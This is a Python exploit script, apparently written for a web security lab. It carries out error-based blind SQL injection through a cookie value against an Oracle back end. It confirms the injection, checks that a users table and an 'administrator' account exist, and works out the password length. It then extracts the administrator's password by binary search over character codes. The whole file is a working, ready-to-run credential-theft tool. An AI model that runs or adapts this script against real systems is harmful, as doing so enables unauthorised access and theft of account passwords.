import sys import requests import urllib3 import urllib.parse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} def test_vulnerability(url, cookies): print("\n(+) Testing SQL injection vulnerability...") # Test 1: Check if parameter is vulnerable print("\n1. Testing parameter vulnerability...") valid_payload = "' || (select '' from dual) || '" invalid_payload = "' || (select '' from dualfiewjfow) || '" valid_cookies = cookies.copy() invalid_cookies = cookies.copy() cookie_name = list(cookies.keys())[0] valid_cookies[cookie_name] = valid_cookies[cookie_name] + urllib.parse.quote(valid_payload) invalid_cookies[cookie_name] = invalid_cookies[cookie_name] + urllib.parse.quote(invalid_payload) valid_response = requests.get(url, cookies=valid_cookies, verify=False, proxies=proxies) invalid_response = requests.get(url, cookies=invalid_cookies, verify=False, proxies=proxies) if valid_response.status_code == 200 and invalid_response.status_code == 500: print("(+) Parameter is vulnerable to SQL injection!") else: print("(-) Parameter might not be vulnerable") return False # Test 2: Check if users table exists print("\n2. Checking if users table exists...") users_payload = "' || (select '' from users where rownum =1) || '" users_cookies = cookies.copy() users_cookies[cookie_name] = users_cookies[cookie_name] + urllib.parse.quote(users_payload) users_response = requests.get(url, cookies=users_cookies, verify=False, proxies=proxies) if users_response.status_code == 200: print("(+) Users table exists!") else: print("(-) Users table might not exist") return False # Test 3: Check if administrator user exists print("\n3. Checking if administrator user exists...") admin_payload = "' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || '" fake_user_payload = "' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='fwefwoeijfewow') || '" admin_cookies = cookies.copy() fake_user_cookies = cookies.copy() admin_cookies[cookie_name] = admin_cookies[cookie_name] + urllib.parse.quote(admin_payload) fake_user_cookies[cookie_name] = fake_user_cookies[cookie_name] + urllib.parse.quote(fake_user_payload) admin_response = requests.get(url, cookies=admin_cookies, verify=False, proxies=proxies) fake_user_response = requests.get(url, cookies=fake_user_cookies, verify=False, proxies=proxies) if admin_response.status_code == 500 and fake_user_response.status_code == 200: print("(+) Administrator user exists!") else: print("(-) Administrator user might not exist") return False # Test 4: Determine password length print("\n4. Determining password length...") password_length = 0 for length in range(1, 51): length_payload = f"' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>{length}) || '" length_cookies = cookies.copy() length_cookies[cookie_name] = length_cookies[cookie_name] + urllib.parse.quote(length_payload) length_response = requests.get(url, cookies=length_cookies, verify=False, proxies=proxies) if length_response.status_code == 200: password_length = length break if password_length > 0: print(f"(+) Password length is {password_length} characters") return password_length else: print("(-) Could not determine password length") return False def get_cookies(url): try: response = requests.get(url, verify=False, proxies=proxies) return response.cookies except Exception as e: print(f"Error fetching cookies: {e}") return None def select_cookies(cookies): if not cookies: print("No cookies found!") return None print("\nAvailable cookies:") for i, (name, value) in enumerate(cookies.items(), 1): print(f"{i}. {name}: {value}") while True: try: choice = input("\nEnter the number of the cookie to use for the payload (or 'all' to use all): ") if choice.lower() == 'all': return cookies choice = int(choice) if 1 <= choice <= len(cookies): cookie_name = list(cookies.keys())[choice-1] return {cookie_name: cookies[cookie_name]} print("Invalid choice. Please try again.") except ValueError: print("Please enter a valid number or 'all'") def sqli_password(url, cookies, password_length): password_extracted = "" def test_char(position, char_code, operator="="): payload = ( "' || (SELECT CASE WHEN (1=1 AND ascii(SUBSTR(password,%d,1))%s%d) " "THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') || '" ) % (position, operator, char_code) cookie_name = list(cookies.keys())[0] modified_cookies = cookies.copy() modified_cookies[cookie_name] += urllib.parse.quote(payload) r = requests.get(url, cookies=modified_cookies, verify=False, proxies=proxies) return r.status_code == 500 for i in range(1, password_length + 1): low = 32 high = 126 while low <= high: mid = (low + high) // 2 sys.stdout.write("\r(+) Extracting: %s%s" % (password_extracted, chr(mid))) sys.stdout.flush() if test_char(i, mid, ">="): # mid is possibly the character, but check if it's not higher if test_char(i, mid, "="): password_extracted += chr(mid) break else: low = mid + 1 else: high = mid - 1 print("\n(+) Extracted administrator password: %s" % password_extracted) def main(): if len(sys.argv) != 2: print("(+) Usage: %s " % sys.argv[0]) print("(+) Example: %s www.example.com" % sys.argv[0]) sys.exit(-1) url = sys.argv[1] print("(+) Fetching cookies from target...") cookies = get_cookies(url) if not cookies: print("(-) Failed to fetch cookies. Exiting...") sys.exit(-1) selected_cookies = select_cookies(cookies) if not selected_cookies: print("(-) No cookies selected. Exiting...") sys.exit(-1) # Test vulnerability and get password length password_length = test_vulnerability(url, selected_cookies) if not password_length: print("(-) Vulnerability testing failed. Exiting...") sys.exit(-1) print("\n(+) Starting password extraction...") sqli_password(url, selected_cookies, password_length) if __name__ == "__main__": main()